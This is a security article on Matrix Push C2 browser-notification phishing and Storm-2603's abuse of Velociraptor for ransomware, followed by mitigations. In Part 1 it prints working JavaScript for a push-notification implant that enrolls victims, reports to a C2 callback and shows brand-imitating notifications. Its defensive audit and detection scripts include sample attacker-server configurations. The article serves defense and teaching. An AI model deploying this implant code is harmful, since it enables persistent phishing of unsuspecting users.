The New Front Lines: Fileless Attacks via Browser Notifications & Weaponized Security Tools
The cybersecurity landscape is shifting as threat actors move away from dropping conventional malware and toward techniques that leave little or nothing on disk. Two recent campaigns illustrate the trend. The first involves Matrix Push C2, a cross-platform fileless phishing framework that abuses the browser's push notification system. The second is the misuse of Velociraptor, a legitimate open-source digital forensics and incident response (DFIR) tool, by the threat actor Storm-2603 to conduct reconnaissance and deploy ransomware inside victim environments.
Part 1: Matrix Push C2 and the Rise of Fileless Browser Exploitation
Matrix Push C2 is a recently identified platform that marks a clear step in the evolution of phishing and social engineering. Instead of relying on malicious downloads or injected scripts, it uses the browser's native push notification capability as a persistent command channel: the operator's server hands messages to the browser vendor's push service, and the service worker registered by the attacker's site renders them as notifications on whatever operating system the browser runs on.
The Cross-Platform Fileless Approach
- Initial Access: Victims are lured to a malicious or compromised site and tricked into granting it notification permission, typically with a fake "verify you are human" or similar check whose only real purpose is to get the Allow button clicked.
- Persistent C2 Channel: Once permission is granted, the operator can send push notifications to the victim's desktop or mobile browser at will. The channel works on Windows, macOS, Linux and Android with no installed malware, and it survives until the user revokes the permission or clears the site's data, because both the grant and the service worker registration live in the browser profile.
- Stealth and Social Engineering: Notifications imitate system alerts or brand messages, such as fake browser updates or warnings purporting to come from MetaMask, PayPal or Netflix, and each one carries a link to a page the operator controls. Because everything runs inside the browser's own process and sandbox, with no new binary, process or persistence mechanism on the host, endpoint defenses that key on those artifacts have little to work with.
- Malware-as-a-Service Model: Matrix Push C2 is sold on cybercriminal marketplaces as a subscription. Buyers get a dashboard for crafting notification templates, managing campaigns and tracking victim engagement.
The result is a class of phishing that stays active long after the victim leaves the original site. It also blurs the line between legitimate browser behavior and malicious activity: a notification from a permitted site is exactly what the browser is designed to deliver, which makes the activity hard to identify and contain.
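To make the mechanism concrete, here is an added example, written for this article and not taken from the Matrix Push C2 kit, of the two halves of such an implant: the page-side enrolment that runs after the Allow click, and the service-worker logic that turns a C2 message into a notification and a click into a visit to the operator's page. The command field names (title, body, icon, url, actions), the C2 registration callback and the VAPID key are assumptions for illustration.

```javascript
// Added illustration (not code from the Matrix Push C2 kit): the two halves of a
// push-notification "implant". Part A runs in the page that tricks the user into
// clicking Allow; Part B is the service worker that stays registered afterwards.
// The command schema (title, body, icon, url, actions) is an assumption made for
// this example, not the real kit's format.

// Part A: page-side code. Real kits wrap this in a fake "verify you are human" box.
// The VAPID public key is a placeholder, not a real key.
const ATTACKER_VAPID_PUBLIC_KEY = 'BExampleVapidPublicKeyPlaceholder';

async function enrollVictim(registerWithC2) {
  const permission = await Notification.requestPermission(); // the "Allow" click
  if (permission !== 'granted') return null;
  const reg = await navigator.serviceWorker.register('/sw.js');
  const sub = await reg.pushManager.subscribe({
    userVisibleOnly: true,
    applicationServerKey: ATTACKER_VAPID_PUBLIC_KEY,
  });
  // The subscription (endpoint + keys) is all the operator needs to push messages
  // for as long as the permission and the registration survive in the profile.
  await registerWithC2(sub.toJSON()); // registerWithC2 is an assumed C2 client callback
  return sub;
}

// What the C2 receives: the endpoint lives on the browser vendor's push service,
// not on the attacker's domain, so the victim's egress never sees the operator's
// server at delivery time.
function summarizeSubscription(subJson) {
  const endpoint = new URL(subJson.endpoint);
  return {
    pushServiceHost: endpoint.host,
    hasEncryptionKeys: Boolean(subJson.keys && subJson.keys.p256dh && subJson.keys.auth),
  };
}

// Part B: service-worker logic, written as pure functions so it can be unit-tested.
// Maps a C2 command to the arguments of ServiceWorkerRegistration.showNotification().
function buildNotification(cmd) {
  if (typeof cmd.title !== 'string' || typeof cmd.url !== 'string') {
    throw new Error('malformed command');
  }
  const actions = cmd.actions || {};
  return {
    title: cmd.title,                 // e.g. a brand name the user trusts
    options: {
      body: cmd.body || '',
      icon: cmd.icon,                 // brand logo makes it pass as a system/brand alert
      requireInteraction: true,       // stays on screen until dismissed or clicked
      data: { url: cmd.url, actions },
      actions: Object.keys(actions).map((id) => ({ action: id, title: actions[id].title })),
    },
  };
}

// Chooses where a click goes: a per-button URL if the user pressed a button,
// otherwise the notification's default URL. Only at this point does the victim's
// browser contact an attacker-chosen address.
function pickClickUrl(data, action) {
  if (action && data.actions[action] && data.actions[action].url) {
    return data.actions[action].url;
  }
  return data.url;
}

// Wire-up that only executes inside a real service worker context.
if (typeof self !== 'undefined' && typeof self.registration !== 'undefined') {
  self.addEventListener('push', (event) => {
    const { title, options } = buildNotification(event.data.json());
    event.waitUntil(self.registration.showNotification(title, options));
  });
  self.addEventListener('notificationclick', (event) => {
    event.notification.close();
    const target = pickClickUrl(event.notification.data, event.action);
    event.waitUntil(self.clients.openWindow(target));
  });
}
```

The service-worker half is written as pure functions so it can be exercised outside a browser; the handlers at the bottom only attach inside a real worker context. Note what summarizeSubscription shows: the endpoint the operator pushes to belongs to the browser vendor's push service, which is why delivery is invisible to egress controls and why the first attacker-owned host the victim contacts is the one behind the click.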
Part 2: Storm 2603 Weaponizes Velociraptor for Covert Ransomware Operations
A second trend is the misuse of trusted security tools so that malicious activity blends into normal operations. Storm-2603, a threat actor assessed to be based in China, has been using Velociraptor, an open-source DFIR tool, as part of a long-running intrusion campaign.
Threat Actor and Operational Overview
| Threat Actor | Tool Misused | Objective |
|---|---|---|
| Storm-2603 | Velociraptor (open-source digital forensics and incident response tool) | Reconnaissance, credential harvesting and ransomware deployment |
The Attack Chain: Turning Defense Tools Into Offensive Assets
- Initial Breach: Storm-2603 typically gains entry by exploiting high-severity vulnerabilities, including flaws in on-premises Microsoft SharePoint Server that the group has abused before.
- Weaponized Deployment: After gaining access, the attackers install an outdated Velociraptor client build packaged with their own client configuration, so it enrolls with attacker-controlled servers. Whatever Velociraptor infrastructure the victim runs is irrelevant: the attackers bring their own server and their own client, and the tool's remote collection and remote execution features become their command channel.
- Stealth and Reconnaissance: The group uses Velociraptor's built-in capabilities to collect system information, harvest credentials, disable endpoint protections and move laterally across both Windows hosts and VMware ESXi environments. Because the tool is legitimate and frequently allow-listed, these actions produce very few alerts.
- Final Payload: Once reconnaissance is complete, Storm-2603 deploys multiple ransomware families, including LockBit, Babuk and Warlock, to maximize the operational and financial impact on the victim.
The misuse of Velociraptor is a significant detection challenge. Host and network activity appears to come from a tool that many security teams run themselves, so an alert on the binary name alone is noisy. The reliable signals are which build is running and where it reports to, and those have to be checked deliberately.
Mitigation: Strengthening Defense Strategies for Modern Threats
These emerging campaigns show that modern defenses must shift from signature-based detection to behavioral monitoring, real-time analysis of legitimate tool usage and strict control over browser and application permissions.
1. Mitigating Matrix Push C2 Attacks
- User Awareness: Train users to decline unexpected notification requests and to treat a site that demands Allow before showing its content as hostile. The prompt looks harmless, but it is the whole attack.
- Browser Permission Management: On managed fleets, set the default notification permission to block and allow-list only the origins that need it through browser policy (for Chromium-based browsers, DefaultNotificationsSetting and NotificationsAllowedForUrls; Firefox has equivalent keys under its Permissions policy). Audit the grants already present in user profiles and revoke anything not on the list.
- Outbound Traffic Inspection: Push delivery itself rides the browser vendor's own push service (the subscription endpoint points at the vendor, not at the attacker), so egress filtering cannot tell a malicious notification from a benign one. What can be controlled is the request the browser makes when a victim clicks: route browser traffic through a web proxy or DNS filter that blocks newly registered and URL-shortener domains, and inspect downloads that originate from a notification click.
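As an added example (not from the article), the audit step above for Chromium-based browsers: it reads the profile's Preferences JSON, lists every origin granted notification permission and flags those outside an allowlist. It assumes the grants sit under profile.content_settings.exceptions.notifications, keyed by origin pattern with setting 1 meaning allow and 2 meaning block, which is Chromium's content-settings encoding; the allowlist and the sample profile are constructed.

```javascript
// Added example (not from the original article): audit the notification grants in a
// Chromium "Preferences" profile file and report any origin outside an allowlist.
// Assumptions: grants live under profile.content_settings.exceptions.notifications,
// keyed "<origin>,*", with setting 1 = allow, 2 = block (Chromium's content-settings
// encoding); the allowlist and the sample profile below are constructed for this example.
const ALLOWED_ORIGINS = new Set(['https://mail.corp.example', 'https://chat.corp.example']);

// Strips the secondary pattern and the implicit :443 so keys compare as plain origins.
function originFromPattern(pattern) {
  return pattern.split(',')[0].replace(/:443$/, '');
}

// Returns [{ origin, setting, lastModified }] for every notification exception.
function listNotificationGrants(prefs) {
  const exceptions =
    (((prefs.profile || {}).content_settings || {}).exceptions || {}).notifications || {};
  return Object.entries(exceptions).map(([pattern, v]) => ({
    origin: originFromPattern(pattern),
    setting: v.setting,
    lastModified: v.last_modified,
  }));
}

// Origins that are currently allowed (setting 1) but not on the allowlist.
function findUnapprovedGrants(prefs, allowlist = ALLOWED_ORIGINS) {
  return listNotificationGrants(prefs)
    .filter((g) => g.setting === 1 && !allowlist.has(g.origin))
    .map((g) => g.origin);
}

// Produces a copy of the Preferences object with unapproved grants flipped to block (2).
// Only write it back while the browser is closed, or the browser will overwrite it.
function revokeUnapproved(prefs, allowlist = ALLOWED_ORIGINS) {
  const out = JSON.parse(JSON.stringify(prefs));
  const exceptions = out.profile.content_settings.exceptions.notifications;
  let changed = 0;
  for (const [pattern, v] of Object.entries(exceptions)) {
    if (v.setting === 1 && !allowlist.has(originFromPattern(pattern))) {
      v.setting = 2;
      changed += 1;
    }
  }
  return { prefs: out, changed };
}

// Constructed sample: two corporate grants, one left behind by a "verify you are human"
// prompt on a throwaway domain, and one already blocked.
const SAMPLE_PREFS = { profile: { content_settings: { exceptions: { notifications: {
  'https://mail.corp.example:443,*':        { expiration: '0', last_modified: '13380000000000000', model: 0, setting: 1 },
  'https://chat.corp.example:443,*':        { expiration: '0', last_modified: '13380000000000000', model: 0, setting: 1 },
  'https://news-verify-check.example:443,*': { expiration: '0', last_modified: '13381000000000000', model: 0, setting: 1 },
  'https://old-site.example:443,*':         { expiration: '0', last_modified: '13370000000000000', model: 0, setting: 2 },
} } } } };

// Stand-alone use: `node audit.js <path-to-Preferences>`; without a path, runs on the sample.
if (typeof require === 'function' && require.main === module) {
  const fs = require('fs');
  const path = process.argv[2];
  const prefs = path ? JSON.parse(fs.readFileSync(path, 'utf8')) : SAMPLE_PREFS;
  console.log(findUnapprovedGrants(prefs));
}
```

On Windows the Chrome profile file is %LOCALAPPDATA%\Google\Chrome\User Data\Default\Preferences; read it while the browser is closed, since Chrome rewrites it on exit. Treat revokeUnapproved as a last resort for unmanaged machines: Chrome protects some preference keys against external edits and may reset them, and on a managed fleet the policy-based block list is the supported route.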
2. Mitigating Storm 2603’s Abuse of Velociraptor
- Binary Verification: Alert on Velociraptor binaries that are unsigned or modified, since official releases are signed by the vendor. A signature check alone is not enough, though: Storm-2603 deployed a genuine but outdated build, so also alert on Velociraptor versions older than the one you deploy, on the binary running from unexpected paths or under other file names, and on any client whose configuration points anywhere but your own server.
- Strict Egress Control: Limit Velociraptor client traffic strictly to the organization's own Velociraptor servers, and alert on the client process connecting anywhere else. If you do not run Velociraptor at all, any instance of it is a finding in its own right.
- Patch and Validate: Keep DFIR tools and administrative utilities up to date, since an outdated build of a trusted tool can carry its own exploitable flaws, and periodically inventory which versions are actually running on endpoints.
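An added example (not from the article, and not Velociraptor's own code) that implements the checks in this list against the attack chain described in Part 2: given process-creation events and the client configuration files they reference, it flags Velociraptor clients that are unsigned or signed by someone else, that carry no external config (a repacked binary with an embedded config), or whose server_urls point anywhere but our own frontend. The events, config files, host names and expected-signer string are constructed or assumed; replace them with your EDR's field names and the exact publisher string it reports.

```javascript
// Added example (not from the article, and not Velociraptor's own code): triage
// process-creation telemetry for Velociraptor clients that do not belong to us.
// Assumptions: the event records and config files below are constructed; the client
// config keeps its server list under `Client.server_urls`; EXPECTED_SIGNER is a
// placeholder to replace with the exact subject string your EDR reports for the vendor.
const EXPECTED_SIGNER = 'Rapid7, Inc.';                              // assumption
const APPROVED_SERVERS = new Set(['velociraptor.corp.example:8000']); // host:port of our frontend

// Pulls every URL listed under server_urls, in block or inline YAML list form.
function extractServerUrls(yamlText) {
  const lines = yamlText.split(/\r?\n/);
  const urls = [];
  for (let i = 0; i < lines.length; i++) {
    const m = lines[i].match(/^\s*server_urls:\s*(.*)$/);
    if (!m) continue;
    const inline = m[1].trim();
    if (inline.startsWith('[')) {
      for (const raw of inline.replace(/[\[\]]/g, '').split(',')) {
        const u = raw.trim().replace(/^["']|["']$/g, '');
        if (u) urls.push(u);
      }
      continue;
    }
    for (let j = i + 1; j < lines.length; j++) {
      const item = lines[j].match(/^\s*-\s*["']?([^"'\s]+)["']?\s*$/);
      if (!item) break;
      urls.push(item[1]);
    }
  }
  return urls;
}

// Heuristic: Velociraptor by file name, by PE OriginalFileName (survives a rename),
// or a renamed binary started with the client's characteristic arguments.
function looksLikeVelociraptor(ev) {
  const base = ev.image.split(/[\\/]/).pop();
  return /velociraptor/i.test(base) ||
    /velociraptor/i.test(ev.originalFileName || '') ||
    /--config\s+\S.*\b(client|service run)\b/i.test(ev.cmdline);
}

function configPathFrom(cmdline) {
  const m = cmdline.match(/--config\s+(?:"([^"]+)"|(\S+))/);
  return m ? (m[1] || m[2]) : null;
}

// Returns an array of { host, check, detail } findings for one event.
function triageEvent(ev, configStore) {
  if (!looksLikeVelociraptor(ev)) return [];
  const findings = [];
  if (!ev.signed || ev.signer !== EXPECTED_SIGNER) {
    findings.push({ host: ev.host, check: 'unsigned_or_wrong_signer', detail: ev.image });
  }
  const cfgPath = configPathFrom(ev.cmdline);
  if (!cfgPath) {
    // No --config on the command line: a repacked binary with an embedded config,
    // or an unexpected invocation. Either way it needs a human look.
    findings.push({ host: ev.host, check: 'embedded_or_missing_config', detail: ev.cmdline });
    return findings;
  }
  const text = configStore[cfgPath]; // in production, read the file from the endpoint
  if (text === undefined) {
    findings.push({ host: ev.host, check: 'config_not_collected', detail: cfgPath });
    return findings;
  }
  for (const url of extractServerUrls(text)) {
    let hostPort;
    try { hostPort = new URL(url).host; } catch (e) { hostPort = url; }
    if (!APPROVED_SERVERS.has(hostPort)) {
      findings.push({ host: ev.host, check: 'unapproved_server', detail: url });
    }
  }
  return findings;
}

function triageAll(events, configStore) {
  return events.flatMap((ev) => triageEvent(ev, configStore));
}

// Constructed telemetry: one sanctioned client and two that should fire.
const SAMPLE_CONFIGS = {
  'C:\\Program Files\\Velociraptor\\client.config.yaml':
    'Client:\n  server_urls:\n  - https://velociraptor.corp.example:8000/\n  nonce: redacted\n',
  'C:\\Windows\\Temp\\c.yaml':
    'Client:\n  server_urls: ["https://203.0.113.50:8000/"]\n',
};
const SAMPLE_EVENTS = [
  { host: 'WS-01', image: 'C:\\Program Files\\Velociraptor\\Velociraptor.exe',
    cmdline: '"C:\\Program Files\\Velociraptor\\Velociraptor.exe" --config "C:\\Program Files\\Velociraptor\\client.config.yaml" service run',
    signed: true, signer: 'Rapid7, Inc.', originalFileName: 'velociraptor.exe' },
  // Genuine, signed, outdated build pointed at an attacker server: a signature check alone passes it.
  { host: 'SP-01', image: 'C:\\Windows\\Temp\\v.exe',
    cmdline: 'C:\\Windows\\Temp\\v.exe --config C:\\Windows\\Temp\\c.yaml client',
    signed: true, signer: 'Rapid7, Inc.', originalFileName: 'velociraptor.exe' },
  // Renamed, unsigned binary with an embedded config.
  { host: 'ESX-MGMT', image: 'C:\\Users\\Public\\svchost64.exe',
    cmdline: 'C:\\Users\\Public\\svchost64.exe client -v',
    signed: false, signer: null, originalFileName: 'velociraptor.exe' },
];

if (typeof require === 'function' && require.main === module) {
  console.log(triageAll(SAMPLE_EVENTS, SAMPLE_CONFIGS));
}
```

The second sample event is the case the signature-only mitigation misses: a genuine, signed but outdated build whose configuration points at 203.0.113.50, which only the server_urls comparison catches. The third is caught through the PE OriginalFileName, which most EDRs expose from the version resource and which a simple rename does not change.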